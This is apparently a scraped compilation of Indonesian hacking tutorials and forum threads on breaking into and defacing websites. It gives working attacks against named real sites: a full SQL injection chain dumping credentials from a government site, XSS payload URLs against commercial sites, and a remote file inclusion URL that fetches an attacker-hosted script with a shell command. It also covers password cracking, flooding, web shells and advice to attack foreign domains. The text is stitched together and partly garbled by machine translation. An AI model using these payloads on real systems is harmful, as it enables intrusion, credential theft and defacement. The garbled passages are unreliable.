Cara Hack Website

Cara hack website Dea Cyndi Rahman Nyoto DARMO Darmi Tangerang Teknik Hacking Situs kaskus.us Dari Berbagai Macam Sisi Oleh : Bokeph MemendeZ

Menyingkapi banyaknya pertanyaan dari kaum hacker di Indonesia, mengenani seputar penjebolan pusat tabulasi kaskus.us – http://www.kaskus.us.go.id, saya ingin berbagi sedikit mengenai teknik yang lain untuk melakukan attack ke situs kaskus.us.go.id atau situs lainnya!. Dani “Xnuxer” Firmansyah mengunakan metode SQL Injection, yang beberapa waktu yang lalu sempat dibahas oleh S’to/Jasakom dalam bukunya. Masih banyak teknik lain yang dapat digunakan untuk melakukan attack ke situs-situs di Internet. Berikut ini saya Bokeph MemendeZ dari HackerSFreakz, ingin membongkar habishabisan seputar hacking kaskus.us dari berbagai macam sisi, selain dari sisi SQL Injection. Seluruh informasi semata-mata yang terpaparkan dalam artikel berbentuk tutorial ini semata-mata untuk ilmu pengetahuan dan teknologi bukan untuk tindakan pidana / kejahatan. “Anda yang membaca, Anda yang mencoba, Anda yang menentukan” … Indonesia “idol” Hacker!

Langsung saja menjawab pertanyaan ribuan orang, bagaimana cara hacking web khususnya www.kaskus.us.go.id, tentunya semua orang ingin mengetahuinya dan mencobanya serta menjadi populer. Bukan begitu? Langsung saja Anda baca tulisan ringkas, padat, berisi, berbobot, dan inovatif berikut ini. Beberapa langkah melakukan hacking website www.kaskus.us.go.id : 1. Anda harus mengetahui alamat web kaskus.us terlebih dahulu, yakni www.kaskus.us.go.id à TARGET! It’s simple man… 2. Berapa IP dynamic dari web kaskus.us.go.id, cara melihatnya, anda dapat masuk ke lingkungan ms-dos dengan cmd.exe / command.com dengan mengetikan ping (Seperti pada Gambar I) – “ping www.kaskus.us.go.id”. Terlihat Terlihat IP kaskus.us: 203.130.201.130 à TARGET 3. Dimana web kaskus.us ini berada, apakah indonesia/amerika/india/dll serta provider apa yang digunakan? Anda dapat masuk kembali pada lingkungan ms-dos dengan

Trusted by over 1 million members

Try Scribd FREE for 30 days to access over 125 million titles without ads or interruptions! Start Free Trial Cancel Anytime.











mengetikan nslookup (Seperti pada Gambar I) – nslookup www.kaskus.us.go.id. Rupanya kaskus.us mengunakan provider indosat.net.id untuk hosting webnya. 4. Langkah selanjutnya setelah dapat mendapatkan info : www.kaskus.us.go.id / 203.130.201.130 / Host Provider : Indosat.net.id Anda harus mengetahui sistim operasi apa yang digunakan oleh kaskus.us.go.id serta indosat.net.id, Anda dapat melakukan mengecek di http://www.netcraft.com

OS, Web Server and Hosting History for www.kaskus.us.go.id http://www.kaskus.us.go.id was running Apache on FreeBSD when last queried at 13Sep-2004 10:00:25 GMT - refresh now FAQ











FreeBSD Apache/2.0.48 (Unix) PHP/4.3.4 2-Apr-2004 203.130.201.130 PT TELEKOMUNIKASI INDONESIA Linux Apache/1.3.27 (Unix) (Red-Hat/Linux) mod_perl/1.24_01 PHP/4.2.2 FrontPage/5.0.2 mod_ssl/2.8.12 OpenSSL/0.9.6b 31-Jul-2003 203.130.196.212 PT TELEKOMUNIKASI INDONESIA Linux Apache/1.3.19 (Unix) (Red-Hat/Linux) mod_perl/1.24_01 PHP/4.0.6 FrontPage/5.0.2 mod_ssl/2.8.1 OpenSSL/0.9.6 9-Jan-2003 203.130.196.102 PT TELEKOMUNIKASI INDONESIA Linux unknown 8-Jan-2003 203.130.196.102 PT TELEKOMUNIKASI INDONESIA Linux Apache/1.3.19 (Unix) (Red-Hat/Linux) mod_perl/1.24_01 PHP/4.0.6 FrontPage/5.0.2 mod_ssl/2.8.1 OpenSSL/0.9.6 26-Sep-2002 203.130.196.102 PT TELEKOMUNIKASI INDONESIA Linux unknown 25-Sep-2002 203.130.196.102 PT TELEKOMUNIKASI INDONESIA Linux Apache/1.3.19 (Unix) (Red-Hat/Linux) mod_perl/1.24_01 PHP/4.0.6 FrontPage/5.0.2











Linux Apache/1.3.14 (Unix) mod_perl/1.24 PHP/4.0.6 FrontPage/4.0.4.3 mod_ssl/2.7.1 OpenSSL/0.9.6 30-Apr-2002 203.130.196.102 PT TELEKOMUNIKASI INDONESIA Linux Apache/1.3.20 (Unix) mod_ssl/2.8.4 OpenSSL/0.9.6b PHP/4.0.6 3-Oct-2001 202.159.35.90

Linux Apache/1.3.20 (Unix) mod_fastcgi/2.2.10 mod_ssl/2.8.4 OpenSSL/0.9.6b PHP/4.0.6 1-Oct-2001 202.159.35.90

OS, Web Server and Hosting History for www.indosat.net.id http://www.indosat.net.id was running unknown on Windows 2000 when last queried at 6-Sep-2004 08:25:40 GMT - refresh now FAQ

OS Server Last changed IP address Netblock Owner Windows 2000 unknown 6-Sep-2004 202.155.27.132 International Transmission Center, Indonesia











202.155.27.132 International Transmission Center, Indonesia NT4/Windows 98 Microsoft-IIS/4.0 12-Dec-2003 202.155.15.26 INDOSATnet unknown Microsoft-IIS/4.0 11-Dec-2003 202.155.15.26 INDOSATnet NT4/Windows 98 Microsoft-IIS/4.0 24-Sep-2002 202.155.15.26 INDOSATnet unknown Microsoft-IIS/4.0 22-Sep-2002 202.155.15.26 INDOSATnet NT4/Windows 98 Microsoft-IIS/4.0 3-Nov-2000 202.155.15.26 Indosat Internet Service Provider

5. Kita ketahui bahwa web www.kaskus.us.go.id mengunakan OS : Apache on FreeBSD. Apache/2.0.48 (Unix) PHP/4.3.4 sedangkan www.Indosat.net.id mengunakan Windows 2000/NT on Microsoft-IIS/5.0/4.0 6. Pelajari kelemahan-lemahan yang ada pada Apache / FreeBSD (Unix) serta PHP/4.3.4 untuk direct hacking langsung ke website kaskus.us atau pelajari kelemahan-kelemahan











Setelah tim kami menganalisa selama beberapa pekan ini, akhir kami mendapatkan kelemahan-kelemahan pada web server provider yang digunakan oleh kaskus.us sebagai tempat penyimpanan hosting mereka, yakni : 1. Web Server IIS sendiri sendiri mempunyai kelemahan kelemahan pada buffer jika terdapat terdapat permintaan dengan menggunakan 3000+ karakter pada .htr file. Dengan perintah ini memungkinkan remote user untuk mengeksesuki perintah2 untuk menguasai komputer target. Mustinya .Htr file tidak dimasukkan sebagai ektensi frontpage. 2. Meskipun IUSR_HOST-INDOSAT & IWAM_HOST-INDOSAT tidak mempunyai hak untuk melakukan ‘Open Office’ tetapi hal ini merupakan sebuah celah untuk user dapat melakukan rpc ke /_vti_bin/shtml.dll untuk mendapatkan login anonymous dari internet account, karena IUSR_HOST-INDOSAT & IWAM_HOST-INDOSAT telah terbuka, meskipun vacum. 3. Hak akses dari web indosat http://202.155.0.10/cgi-bin me-mungkinan direktori browsing dilakukan sehingga ada kecenderungan remote user melakukan browsing dan mencari kelemahan lainnya. Meskipun yang dapat mengakses hanya orang-orang yang subscribe ke hosting indosat itu sendiri. 4. Pada direktory direktory /_vti_bin/ ditemukan Fpcount.exe. Program ini bermasalah pada NT pada buffer merupakan suatu celah dimana IIS Hole dan dapat diakses dengan mudahnya. 5. HelpAssistant & SUPPORT_388945a0 SUPPORT_388945a0 terbuka oleh si Admin. Meskipun Meskipun hanya hanya team team Microsoft saja yang dapat mengaksesnya karena private password untuk support product mereka, tapi hal ini merupakan ancaman untuk si web server itu sendiri. Langsung Hacking kaskus.us lewat bugs indosat.net.id 1. 2. 3.

Lakukan null koneksi (null connection) Lakukan flood byte ke www.indosat.net.id / IP 202.155.0.10 Lakukan flood file ke www.indosat.net.id / IP 202.155.0.10

Setelah anda melakukan ketiga langkah diatas, akhirnya Anda dapat melakukan ‘net view’ dengan mengunakan kelemahan mac address, seperti yang terlihat pada gambar. Oops.. Rupanya orang-orang indosat suka juga dengan GAMES ya…? Sekarang Anda dapat melihat sharing Direktori mereka! Begitu cerobohnya mereka tidak memikirkan 5 hal yang telah dibahas diatas. Dengan melihat share folder, anda dapat mengunakan IPC$, C$, ADMIN$, dsbnya semuanya dapat anda lihat, akan tetapi bagaimana dengan user dan password ? Menebak password ? Terlalu lama dan belum tentu berhasil!! 2 Cara ampuh yang dapat anda













1. Gunakan program NAT (gratis untuk versi non-GUI) atau versi komersialnya $19 yakni NetTools. Dengan memanfaatkan netbios/mac-addr dari null connection anda dapat melakukan cracking user dari kamus yang telah anda siapkan (download di internet – gratis!) NAT akan berjalan sampai kamus password anda habis, ada beberapa username dan biasanya banyak username yang ceroboh, dalam kasus ini kami mendapatkan username ceroboh dari RAHMAT yakni password ‘123456’ status Administrator, disini anda dapar mengunakan program GetAdmin untuk membuat user baru + password atau untuk merubah password Admin. Gunakan Remote Desktop Connection anda langsung Anda remote computer target. Masuk dengan mengunakan user : RAHMAT password : 123456, dan apa yang Anda lihat sebuah tampilan Windows 2000 Server, waw…w semua username/password isp ada disana, termasuk hosting kaskus.us anda dapat menemukan pada direktori sub. inetpub mereka. Cari default.html / index.html atau .asp / .php dan rubah dengan tulisan “Defaced by Bokeph MemendeZ / ”. Jangan lupa backup file index mereka, jangan menjadi perusak. Dan buku web browser ketik web www.kaskus.us.go.id, dengan tampilan simple “Bokeph MemendeZ was back & here in your System Project / HackerSFreakz”/ 2. Gunakan Program NETBRUFO, Program ini saya dapatkan dari seorang teman, yang dulunya pernah heboh dalam dunia hacking di Indonesia serta pemimpin group hacking di Indonesia yang di kenal sebagai : The Computer Underground, yakni Mr. Andry Christian, saat ini beliau merupakan peneliti & pakar jaringan komunikasi khususnya dalam scope keamanan jaringan komunikasi yang tergabung dalam Sekurindo. Program simple yang diciptakan seperti layaknya program NAT, perbedaannya, pada NAT kita harus memiliki kamus password, tetapi pada NETBRUFO, kamus file (dict.txt) bersifat optional karena karena memiliki menu Brute Force, yang pengoperasiannya disesuaikan dengan encryption yang ada pada SAM Windows System serta metode-metode enkripsi yang lainnya.











Kalau tidak salah, Mr. Andry Christian pernah memaparkan software buatannya di PCPlus, entah versi berapa? Selama ini saya hanya mengunakan software NETBRUFO dan WEBTRACE dari King Jones –Australia, karena software tersebut sangat mudah dan password yang dapat dicrack akurat pula. Barang kali URLnya masih ada, coba cek di http://www.sampah.org/netbrufo.zip dan http://www.sampah.org/webtrace.zip Contoh Program NETBRUFO untuk Hacking Via BruteForce & Kamus Contoh Program WEBTRACE untuk Hacking Via BruteForce & Kamus Hacking www.kaskus.us.go.id lewat bugs *nix (Apache/BSD) Kini tiba saatnya hacking lewat bugs/hole/lobang dari d ari *nix, sering-sering surfing lihat informasi seputar kemanan di Internet, sitenya sangat banyak sekali, anda bisa mencarinya di google (tutorial juga tersedia). Di Jasakom telah banyak tutorial hacking *nix, teknik dan langkah-langkah tidak perlu diuraikan lagi, yang perlu hanya exploitsnya, bukan? Kami sudah test exploit root-attack.c (0day) di labs MicroStar Security Care, Kelapa Gading, dan hasilnya sangat memuaskan. Dengan mudah, kami mendapatkan akses admin, luar biasa!! Stop!! Jangan hanya compile pake gcc lalu jalankan jalankan masukin ip lihat config, dsbnya, tapi coba pelajari langkah-langkah mereka itu yang terpenting. Untuk bugs ini, kami sudah memberitahukan kepada Tim IT kaskus.us.GO.ID untuk menambalnya, sebelum artikel ini dikeluarkan. Jadi kami minta maaf, karena kami hanya membongkar yang sudah diperbaiki bukan merusak!! Silahkan anda copy script exploit berikut ini, dan jalankan pada mesin *nix, coba situs-situs yang memiliki kelemahan Apache/BSD yang lainnya, biasanya situs-situs bertitik *.il *.nr *.kr masih lemah dan payah sistim kemanannya, untuk latihan silahkan hajar situs-situs tersebut. Download r00t-attack.c · Kesimpulan











ingin mengambil dendam atau mungkin anda ingin bersenang-senang atau hanya mempelajari bagaimana untuk melakukannya! Anda dapat menghapus situs yang berarti ganti asli dengan indeks yang baru atau Anda dapat memperoleh akses ke member area situs yang mungkin lebih mudah. Defacing Anda dapat menghapus situs melalui telnet atau browser anda dengan menjalankan perintah di remote tua atau misconfigured server, yang sulit untuk dilakukan adalah menemukan server yang lama, mungkin jaringan sekolah atau universitas akan dilakukan, mendapat CGI BuG searcher.This Program ini akan memindai kisaran IP untuk web server dan akan memindai mereka untuk diketahui bug dalam cgis atau bug dan holes.You dapat mempelajari cara exploite tertentu lubang dengan menambahkan yahoo nama bug / lubang kata dan memanfaatkan , mencari "cmd.exe memanfaatkan." Terdapat lebih dari 700 lubang yang mungkin ada banyak server! Anda juga dapat menghapus sebuah situs web oleh mencari ftp password dan hanya mencari situs ftp dan mengganti mengg anti index.htm.You melakukannya dengan: kasar memaksa Untuk melakukan itu Anda memerlukan pompa hewan atau hewan memaksa penyerang dan beberapa kata daftar, yang mengirimkan beberapa hewan pompa user / lulus permintaan kata yang picks dari namelists dan mencoba untuk hack account sampai it does! So lets say a situs porno yang meminta password, you go there you menyalin alamat mereka, Anda menambahkan alamat ke dalam sebuah program yang disebut hewan pompa dan kemudian dari hewan pompa Anda memilih file teks dengan nama yang akan digunakan sebagai pengguna dan teks dengan nama yang akan digunakan sebagai password, maka hewan pompa akan mencoba sampai menemukan benar user / lulus ini harus lebih mudah untuk pemula selain memanfaatkan bug cgi, banyak pemula bahkan havent heard of it i hope i didnt confuse Anda dengan tutorial ini mungkin ada lebih tuts tentang web hacking dan bug cgi such.Till dan kemudian mencoba untuk mencari cara untuk bug cgi sendiri dengan cgi Scanners di Web Hacks bagian atau mendownload crack kasar pompa ke account.

http://static.wetpaint.com/img/bg/1.png?v=20090619151023 punkey8oy Latest punkey8oy halaman update: dibuat oleh punkey8oy, 19 Februari 2009, 7:04 PM











Thread mulai: 22 Desember 2007, 4:16 PM EST Watch Hi saya baru disini dan tidak ada yang tahu tentang hacking, namun saya sungguhsungguh ingin hack atau ada yang hacked websit tetapi tidak tahu cara untuk pergi tentang itu, saya adalah alasan situs Advertises penjualan barang untuk mendapatkan uang Anda lenyap dan tidak ada barang, mereka kerabit saya tentang biaya untuk 2 laptop saya dekat 600 sugi saya tidak dapat melakukan banyak legaly menyebabkan saya tidak punya bukti dan merupakan situs beijing, anyone help me on this, baik b aik instruksi atau sesuatu mereka harus berhenti sebelum orang lain adalah frauded uang [email protected] 17 dari 22 menilainya berharga. Apakah Anda menemukan ini berharga? Do you?

hacking web untuk pemula gungbaster 20-05-2009, 09:07 PM di karenakan banyak yg minat tentang hacking web iseng2 gue copasin aja teknik2 hack web dari beberapa source (sebagian teknik hacking ini masih up to date sebagian dah di patch ama admin situs yg di serang tapi metodenya masih bisa kok) >:D<

1st blood tentang xss neh :D mungkin ada yg nanya apakah Xss itu XSS adalah suatu cara memasukan code/script HTML kedalam suatu web site dan dijalankan melalui browser di client. Xss mungkin jenis serangan yang paling cupu bagi seorang attacker yang tidak mempunyai Bug atau exploit. dikarenakan Xss hanya membutuhkan sebuah browser saja. 1. pertamanya seh kita kudu cari situs yg vurn (bisa di hacking dengan teknik xss) mencari situs yang vulner emang gampang-gampang susah, karena kebanyakan situs udah memfilternya, tapi kita bisa menggunakan google untuk cari neh vurn :D Betul, kita menggunakan Dork dengan query inurl:"search.php?q="atau jika manual kita bisa mencoba fasilitas sebuah site seperti Guest book, Search Box, Shoutboxes, Comment atau forum. 2. Nah sekarang jika sudah kita ketemukan target kita akan mencoba mengexploit site itu dulu, apakah site itu mempunyai vulner terhadap XSS.











maka situs yang mempunyai bug tadi akan berubah tampilan menjadi gambar yang kita upload t adi :D 8. metode penyisipan lain selain dengan gambar juga bisa kita lakukan misalnya dengan file flash (SWF) hingga serangan ini mempunyai style tersendiri contoh code yg di gunakan seperti ini >>> 9. yg maka jika dieksekusi , kita akan di redirect ke situs google, mungkin biasa aja, tapi gimana klo dibawa ke suatu situs login palsu misalnya fake login yahoo, mungkin bisa berbahaya juga tuh. gue rasa yg le bih master pasti tau apa sebanya ini :D

Aurel [email protected] teknik ke 2 menunya adalah sql injection (targetnya adalah http://www .gunungkidulkab.go.id (http://www.gunungkidulkab.go.id/) << tapi neh web dah di patch adminnya (dolo neh web ancur banget dah banyak yg jebolin sampe gak ke itung) :( jadi untuk experiment sendiri cari aja we b korbannya sendiri 1. Lakukan pengecekan dengan memasukkan karakter tanda petik satu single_quote ( ' ) dan mengujinya dengan operator logika ( AND ).http://www.gunungkidulkab.go.id/home.php? mode=content&submode=detail&id=870'2.Halaman akan menampilkan pesan error Fatal error: Call to a member function MoveNext() on a non-object in /var/www/sites/gunungkidulkab.go.id/gunungkidulkab.go.id/subdomains/www/html/program/publis h_content.php on line 225berarti neh situs vurn 3. http://www.gunungkidulkab.go.id/home.php?mode=content&submode=detail&id=870+and+1=1 http://www.gunungkidulkab.go.id/home.php? mode=content&submode=detail&id=870+and+1=6Hasil Uji : -Pada pengecekan AND+1=1 yang dihasilkan adalah TRUE, maka halaman akan tampil secara normal. -Pada pengecekan AND+1=6 hasilnya adalah FALSE, halaman akan menampilkan pesan kesalahan (tidak berjalan normal). 4. Memeriksa jumlah field dari suatu tabel. Perintah yang digunakan adalah ORDER+BY+num, lakukan penambahan/increment pada variabel num. Parameternya adalah jika field masih tersedia maka halaman akan berjalan normal, namun sebaliknya jika field tidak tersedia maka halaman akan menampilkan pesan error. Pada contoh kali ini ditemukan batas akhir field sampai pada angka 14. http://www.gunungkidulkab.go.id/home.php? mode=content&submode=detail&id=870+order+by+14--Mengapa ada tanda -- diakhir perintah? Tanda -- adalah parameter komentar pada sintaks sql, bisa juga menggunakan /*. Sesuai dengan fungsinya kita akan men-set komentar terhadap sintaks setelah klausa WHERE. Kebetulan pada













+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TAB LE_SCHEMA=DATABASE(). Gunakan klausa WHERE TABLE_SCHEMA=DATABASE(), agar tabel yang keluar adalah tabel dari database yang digunakan. Kalau Anda ingin melihat seluruh tabel dari seluruh database klausa WHERE tidak perlu Anda gunakan.http://www.gunungkidulkab.go.id/home.php?mode=content&submode=detail&id=870+union+all+select+1,2,3,4,5,concat_ws(0x2B,vers ion(),database(),user()),7,group_concat(table_name ),9,10,11,12,13,14+from+information_schem a.tables+ where+table_schema=database()--Pada perintah diatas, Anda dapat mengganti concat_ws(0x2B,version(),database(),user()) dengan angka 6, jika Anda tidak ingin menampilkan informasi tentang versi mysql, nama database, dan nama user.

8. Nama tabel telah kita ketahui, selanjutnya kita akan mengeluarkan nama field dari tabel yang menyimpan UserID dan Password pengguna. Pada website ini nama tabel yang dimaksud adalah tblpengguna. Sintaks dasarnya adalah UNION+ALL+SELECT+no_field+no_field+GROUP_CONCAT(CO LUMN_NAME) +FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+T ABLE_NAME='NAMA_TABLE'. Jika terjadi error maka kita harus meng-konversi nama tabel ke bentuk hexadecimal_sql sehingga menjadi 0x74626C70656E6767756E61 http://www.gunungkidulkab.go.id/home.php?mode=content&submode=detail&id=870+union+all+select+1,2,3,4,5,6,7,group_concat(co lumn_name),9,10,11,12,13,14+from+information_schem a.columns+where+table_name=0x74626C70656E6767756E6 a.columns+where+table_name=0x74626C70656E67677 56E6 1--9. Langkah terakhir kita akan mengeluarkan record-record dari tabel tblpengguna. Sintaks dasarnya UNION+ALL+SELECT+no_field+no_field+CONCAT_WS(PEMIS AH_HEXA_SQL,NAMA_FIELD1,NAMA_FIELD2,....)+FROM+NAM A_TABLE. Kalau dijalankan pada contoh kasus kali ini menjadi :http://www.gunungkidulkab.go.id/home.php? mode=content&submode=detail&id=-870+union+all+select+1,2,3,4,5,6,7,concat_ws(0x2B, tblpengguna_login,tblpengguna_pass),9,10,11,12,13, 14+from+tblpengguna--p1T4qH@ ([email protected])Jasakom Security Group ([email protected]) nb: itu adalah teknik dasar buat sql injektion terkadang di perlukan ketekunan untuk menemukan











yg gak di panggil malah munculan wkwkwk :D adit83 20-05-2009, 10:31 PM turut memanggil penunggu2 dan suhu2 sub forum ini untuk memberikan contoh hasil kerajinannya dan memberikan tambahan (klo ada yg mau dateng :D ) @proceker rasanya lo ada kan hasil xss situs kemaren bisa di tunjukin di sene gak? (buat contoh hasil xss) iya tuh om proceker masa kgk dateng : P:P nih contohnya ya om: website 4shared:http://www.4shared.com/network/search.jsp? sortType=1&sortOrder=1&sortmode=2&searchName=adit+pratama&searchmode=2&searchName= adit+pratama&searchDescription=%22%3E%3Cscript%3Ealert(%27Xss% adit+pratama&searchDescription=%22% 3E%3Cscript%3Ealert(%27Xss%2 2 0nya%20kok%20ada %20sih%20by:adit83%27);%3C/script%3E Asu eh asus deh : http://vip.asus.com/eservice/techservok.aspx?SLanguage=en-us&caseid= %3Cscript%3Ealert(%22XSS%20ATTACK%20By%20---=====Adit83=====---%22)%3C/script %3E%3CMARQUEE%20BGCOLOR=%22White%22%3E%3CH1% %3E%3CMARQUEE%20BG COLOR=%22White%22%3E%3CH1% 3EXSS%20ATTACK%20By% 3EXSS%20ATTACK%20By%20--20--=====Adit83=====---%3C/H1%3E%3C/MARQUEE%3E satu lagi nih indocenter : http://www.indocenter.co.id/bycategory.php?q=Xss%20nya %20ditemukan%20nih%20---=====Adit83=====--gungbaster 20-05-2009, 10:57 PM @adit83 good job :D pembahasan clue code xss adit83 di asus











1.gw gak bisa masuk ke google karena di block oleh admin...gimana supaya gw bisa masuk google tanpa perlu lapor ke admin? 2.gw coba DL file dari RS,tapi dilimit hingga 1 KB/s...gimana gw bisa tembus,diatas batas yang ditentukan oleh admin? -------------------------------------------------------------------------------charles78908-05-2007, 04:09 AM download dari rs transfer rate nya cuma 1 kb/s?itu artinya kecepatan transfer rate internet km cuma 1 kb/s.biasanya semakin mahal bandwith yg km beli maka transfer rate km akan makin bsr.sbg cnthnya gini: kk sewa internet 64 kbps dedicated 1:1 maka km akan dpt transfer rate download sebesar 8 kb/s.dari manakah saya bisa blg dpt 8 kb/s.caranya gini: 64 kbps dibagi 8 bit maka hasilnya menjadi 8 kbps. -------------------------------------------------------------------------------charles78908-05-2007, 04:12 AM jika kk masi penasaran sama yg namanya internet kk bisa kul di jurusan Teknik informatika atau ga cari kursus2 komputer gitu.soal menembus batas limit itu ga bisa











64 kbps dibagi 8 bit maka hasilnya menjadi 8 kbps. justru itu bos...ditempat gw gawe tuh bandwithnya 2 MB n 1:1 pula...;;)...thanx atas penjelasannya...tapi gw udah tau pula soal itung"annya...oia,speed yang gw sebut itu cuma sample aja kok..aslinya mah gak segitu juga...:P...sedangkan RS itu cuma sample aja...intinya bisa nagkep khan...:) jika kk masi penasaran sama yg namanya internet kk bisa kul di jurusan Teknik informatika atau ga cari kursus2 komputer gitu.soal menembus batas limit itu ga bisa kk.kecuali km dapat user id ama pass dia wat login ke router gitu dengan memakai putty sebagai contohnya. sekali lagi thanx atas masukannya...:-*...tapi ane dah melewati masa" kuliah bos... -------------------------------------------------------------------------------newbie_neutron13-05-2007, 06:36 PM Login as adminsitrator mungkin....??? -------------------------------------------------------------------------------kampang26-06-2007, 02:00 PM pake HTTP, cari aja oms di google --------------------------------------------------------------------------------











antivirus susah booo kemungkinan berhasil na sekitar 1% too (itu juga klo yg make kompu na bego) klo menurut gue cara yg terbaik pake trojan atau virus varian baru yg lo modif source code na yg isa membuka hole security di suatu kompu (minimal isa mematikan firewall) klo pake tools kayak na gak isa (mana ada orang yg mau dipasangin tools biar kompu na isa lo remote:D:D )

searching aja pake googling, yahooing, ama nungging wkwkwkwkwkw:D: D cemens 09-04-2007, 09:30 PM @gung kek nya kompi wa kena trojan atau virus varian baru neh[yang di modif] :D :D :D /sob /sob /sob /sob gungbaster 09-04-2007, 09:38 PM @atas sing sabar bos hari gini yg bikin virus pada bedul nyusahin aja (virus indo kok temanya kebanyakan cinta molo ya) parahhhh CalvinLimuel 09-04-2007, 09:41 PM Windows Remoting Trojan Horse War**Angel 10-04-2007, 09:05 AM back orifice yg editan dong :D source kan ada diluaran :) kurei 10-04-2007, 09:38 AM













vBulletin® v3.8.3, Copyright ©2000-2009,

IndoForum > Hobby > Computer Stuff > Security & Hacking > hacking : Cara Deface -------------------------------------------------------------------------------PDAView Full Version : hacking : Cara Deface

-------------------------------------------------------------------------------dede2303-08-2006, 04:23 PM Saya ingin berbagi pengalaman tentang nge-Deface dan berbagai command command yang bermanfaat bagi kita didalam nge-Deface.. Oke deh ga perlu berpanjang lebar apa itu DEFACE.... wong kita cuman mempelajari











Kamu Search di Google masukkan Kata Kunci modules.php powered by pnphpbb2 site:.com / modules.php powered by pnphpbb2 site:.net atau apa saja yang kalian suka atau kehendaki... nah sekarang saya kasi contoh pathnya … http://target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path= Contoh : http://www.sikhe.com/modules/PNphpBB2/includes/functions_admin.php? phpbb_root_path=http://geocities.com/hackerbalinese/hackbalinese.txt?&cmd=uname %20-a;cd;pwd - Support Ticket











-------------------------------------------------------------------------------asa1704-08-2006, 09:33 AM oke tuch, tak pelajari dulu yach, ntar kl bingung leh nanya kan -------------------------------------------------------------------------------Jourdan04-08-2006, 12:02 PM swt, gwe pernah baca nieh article di apa hack.com gitu jambi_hack kayanya --------------------------------------------------------------------------------











Not quite Critical .. But kinda annoying a nnoying vulnerabilities believe .. Thanks. Th0R -------------------------------------------------------------------------------kodoks17-08-2006, 07:00 PM /swt /swt /swt Why dont u just use that kind of RFI to use the c99 or r57?? Then just easily upload shells on it?? LOL Why do we need to deface something which vulnerable enough to be taken over?? And i do believe there is something that u need to patch on the site of http://www.bali-











--- Quote --cd namadirectory = Melihat Suatu directory --> koreksi : cd = change directory, pindah ke directory yg dimaksud, bukan lihat. ls -al = Melihat Suatu Directory Lebih Dalam lagi --> koreksi : -a = all files termasuk hidden *nix *n ix files (file yg dimulai dengan titik) -l = long listing (tampilkan list panjang), jadi bukan melihat lebih dalam (recursive) fined = Mengecek Directory directory --> no comment, dengar aja blom pernah. wget = MengUpload suatu Files --> koreksi : wget untuk download, sama dengan flashget di windows













DoS router <<< baru mantab /no1 -------------------------------------------------------------------------------IMAN_MANIAKS05-10-2006, 02:26 PM











GYIHIHIHIHIHIHH __________________ Thanks, Th1R IP Lu Gw Cek Ya /pmg Sapa Tau Lu ***[email protected] /? <-- Understand What I Mean /?











6. * Jika terdapat DORK[kata kunci google] gunakan lah Dork tersebut, * Jika tidak gunakanlah Judul dari Exploit tersebut 7. Setelah dapat hasil dari Google, klik kanan Open NewTab[Nah ini untung nya Pake Firefox, tapi IE versi terbaru sudah bisa Open NewTAB] 8. Buka terus dari List/Daftar2 yang terdapat dari google, hingga kamu rasa penuh











melakukan denial of servis (DoS) attack yaitu mengirimkan request palsu pada server yang berlebihan sehingga kerja server lambat dan lama-kelamaan server akan crash dan down. Untuk dapat melakukan web deface, defacer melakukan beberapa tahap sebagai berikut :

Cara Hack Website

Recommend Documents